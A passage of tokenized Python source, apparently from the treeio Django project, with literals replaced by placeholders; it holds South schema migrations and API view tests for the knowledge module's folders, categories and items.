'<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:object_name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:label>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:value>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } <EOL> } <EOL> complete_apps = [ '<STR_LIT>' ] </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> from django . test import TestCase <EOL> from django . test . client import Client <EOL> from django . test . utils import override_settings <EOL> from django . core . urlresolvers import reverse <EOL> from django . contrib . auth . models import User as DjangoUser <EOL> from treeio . core . models import User , Group , Perspective , ModuleSetting , Object <EOL> from treeio . knowledge . models import KnowledgeFolder , KnowledgeItem , KnowledgeCategory <EOL> @ override_settings ( HARDTREE_API_AUTH_ENGINE = '<STR_LIT>' ) <EOL> class KnowledgeViewsTest ( TestCase ) : <EOL> "<STR_LIT>" <EOL> username = "<STR_LIT>" <EOL> password = "<STR_LIT>" <EOL> prepared = False <EOL> authentication_headers = { "<STR_LIT>" : "<STR_LIT:application/json>" , <EOL> "<STR_LIT>" : "<STR_LIT>" } <EOL> content_type = '<STR_LIT:application/json>' <EOL> prepared = False <EOL> def setUp ( self ) : <EOL> "<STR_LIT>" <EOL> if not self . prepared : <EOL> Object . objects . all ( ) . delete ( ) <EOL> try : <EOL> self . group = Group . objects . get ( name = '<STR_LIT:test>' ) <EOL> except Group . DoesNotExist : <EOL> Group . objects . all ( ) . delete ( ) <EOL> self . group = Group ( name = '<STR_LIT:test>' ) <EOL> self . group . save ( ) <EOL> try : <EOL> self . user = DjangoUser . objects . get ( username = self . username ) <EOL> self . user . set_password ( self . password ) <EOL> try : <EOL> self . profile = self . user . profile <EOL> except Exception : <EOL> User . objects . all ( ) . delete ( ) <EOL> self . user = DjangoUser ( username = self . username , password = '<STR_LIT>' ) <EOL> self . user . set_password ( self . password ) <EOL> self . user . save ( ) <EOL> except DjangoUser . DoesNotExist : <EOL> User . objects . all ( ) . delete ( ) <EOL> self . user = DjangoUser ( username = self . username , password = '<STR_LIT>' ) <EOL> self . user . set_password ( self . password ) <EOL> self . user . save ( ) <EOL> try : <EOL> perspective = Perspective . objects . get ( name = '<STR_LIT:default>' ) <EOL> except Perspective . DoesNotExist : <EOL> Perspective . objects . all ( ) . delete ( ) <EOL> perspective = Perspective ( name = '<STR_LIT:default>' ) <EOL> perspective . set_default_user ( ) <EOL> perspective . save ( ) <EOL> ModuleSetting . set ( '<STR_LIT>' , perspective . id ) <EOL> self . folder = KnowledgeFolder ( name = '<STR_LIT:test>' , treepath = '<STR_LIT:test>' ) <EOL> self . folder . set_default_user ( ) <EOL> self . folder . save ( ) <EOL> self . category = KnowledgeCategory ( name = '<STR_LIT:test>' , treepath = '<STR_LIT:test>' ) <EOL> self . category . set_default_user ( ) <EOL> self . category . save ( ) <EOL> self . item = KnowledgeItem ( name = '<STR_LIT:test>' , folder = self . folder , <EOL> category = self . category , treepath = '<STR_LIT:test>' ) <EOL> self . item . set_default_user ( ) <EOL> self . item . save ( ) <EOL> self . parent = KnowledgeFolder ( name = '<STR_LIT:test>' , treepath = '<STR_LIT:test>' ) <EOL> self . parent . set_default_user ( ) <EOL> self . parent . save ( ) <EOL> self . client = Client ( ) <EOL> self . prepared = True <EOL> def test_unauthenticated_access ( self ) : <EOL> "<STR_LIT>" <EOL> response = self . client . get ( '<STR_LIT>' ) <EOL> self . assertEquals ( response . status_code , <NUM_LIT> ) <EOL> def test_get_folders_list ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . client . get ( <EOL> path = reverse ( '<STR_LIT>' ) , ** self . authentication_headers ) <EOL> self . assertEquals ( response . status_code , <NUM_LIT:200> ) <EOL> def test_get_folder ( self ) : <EOL> response = self . client . get ( path = reverse ( '<STR_LIT>' , kwargs = { <EOL> '<STR_LIT>' : self . folder . id } ) , ** self . authentication_headers ) <EOL> self . assertEquals ( response . status_code , <NUM_LIT:200> ) <EOL> def test_update_folder ( self ) : <EOL> updates = { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : self . parent . id , '<STR_LIT>' : '<STR_LIT>' } <EOL> response = self . client . put ( path = reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : self . folder . id } ) , <EOL> content_type = self . content_type , data = json . dumps ( updates ) , <EOL> ** self . authentication_headers ) <EOL> self . assertEquals ( response . status_code , <NUM_LIT:200> ) <EOL> data = json . loads ( response . content ) <EOL> self . assertEquals ( updates [ "<STR_LIT:name>" ] , data [ "<STR_LIT:name>" ] ) <EOL> self . assertEquals ( updates [ "<STR_LIT>" ] , data [ "<STR_LIT>" ] [ "<STR_LIT:id>" ] ) <EOL> self . assertEquals ( updates [ "<STR_LIT>" ] , data [ "<STR_LIT>" ] ) <EOL> def test_get_categories_list ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . client . get ( <EOL> path = reverse ( '<STR_LIT>' ) , ** self . authentication_headers ) <EOL> self . assertEquals ( response . status_code , <NUM_LIT:200> ) <EOL> def test_get_category ( self ) : <EOL> response = self . client . get ( path = reverse ( '<STR_LIT>' , kwargs = { <EOL> '<STR_LIT>' : self . category . id } ) , ** self . authentication_headers ) <EOL> self . assertEquals ( response . status_code , <NUM_LIT:200> ) <EOL> def test_update_category ( self ) : <EOL> updates = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> response = self . client . put ( path = reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : self . category . id } ) , <EOL> content_type = self . content_type , data = json . dumps ( updates ) , <EOL> ** self . authentication_headers ) <EOL> self . assertEquals ( response . status_code , <NUM_LIT:200> ) <EOL> data = json . loads ( response . content ) <EOL> self . assertEquals ( updates [ "<STR_LIT:name>" ] , data [ "<STR_LIT:name>" ] ) <EOL> self . assertEquals ( updates [ "<STR_LIT>" ] , data [ "<STR_LIT>" ] ) <EOL> def test_get_items_list ( self ) : <EOL> """<STR_LIT>""" <EOL> response = self . client . get ( <EOL> path = reverse ( '<STR_LIT>' ) , ** self . authentication_headers ) <EOL> self . assertEquals ( response . status_code , <NUM_LIT:200> ) <EOL> def test_get_item ( self ) : <EOL> response = self . client . get ( path = reverse ( '<STR_LIT>' , kwargs = { <EOL> '<STR_LIT>' : self . item . id } ) , ** self . authentication_headers ) <EOL> self . assertEquals ( response . status_code , <NUM_LIT:200> ) <EOL> def test_update_item ( self ) : <EOL> updates = { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT>' : self . folder . id , '<STR_LIT>' : self . category . id , <EOL> '<STR_LIT:body>' : '<STR_LIT>' } <EOL> response = self . client . put ( path = reverse ( '<STR_LIT>' , kwargs = { '<STR_LIT>' : self . item . id } ) , <EOL> content_type = self . content_type , data = json . dumps ( updates ) , <EOL> ** self . authentication_headers ) <EOL> self . assertEquals ( response . status_code , <NUM_LIT:200> ) <EOL> data = json . loads ( response . content ) <EOL> self . assertEquals ( updates [ "<STR_LIT:name>" ] , data [ "<STR_LIT:name>" ] ) <EOL> self . assertEquals ( updates [ "<STR_LIT:body>" ] , data [ "<STR_LIT:body>" ] ) <EOL> self . assertEquals ( updates [ "<STR_LIT>" ] , data [ "<STR_LIT>" ] [ "<STR_LIT:id>" ] ) <EOL> self . assertEquals ( updates [ "<STR_LIT>" ] , data [ "<STR_LIT>" ] [ "<STR_LIT:id>" ] ) </s>
<s> import datetime <EOL> from south . db import db <EOL> from south . v2 import SchemaMigration <EOL> from django . db import models <EOL> class Migration ( SchemaMigration ) : <EOL> def forwards ( self , orm ) : <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> db . delete_column ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> db . delete_column ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def backwards ( self , orm ) : <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT>' , self . gf ( <EOL> '<STR_LIT>' ) ( max_length = <NUM_LIT:255> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( <EOL> '<STR_LIT>' ) ( max_length = <NUM_LIT:255> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) <EOL> ( null = True , blank = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( <EOL> '<STR_LIT>' ) ( max_length = <NUM_LIT:255> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( <EOL> '<STR_LIT>' ) ( max_length = <NUM_LIT:255> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( <EOL> '<STR_LIT>' ) ( max_length = <NUM_LIT:255> ) ) , <EOL> ( '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( <EOL> to = orm [ '<STR_LIT>' ] , unique = True , primary_key = True ) ) , <EOL> ( '<STR_LIT>' , self . gf ( <EOL> '<STR_LIT>' ) ( max_length = <NUM_LIT:255> ) ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( <EOL> related_name = '<STR_LIT>' , null = True , to = orm [ '<STR_LIT>' ] , blank = True ) , keep_default = False ) <EOL> db . add_column ( '<STR_LIT>' , '<STR_LIT>' , self . gf ( '<STR_LIT>' ) ( <EOL> related_name = '<STR_LIT>' , null = True , to = orm [ '<STR_LIT>' ] , blank = True ) , keep_default = False ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:body>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : 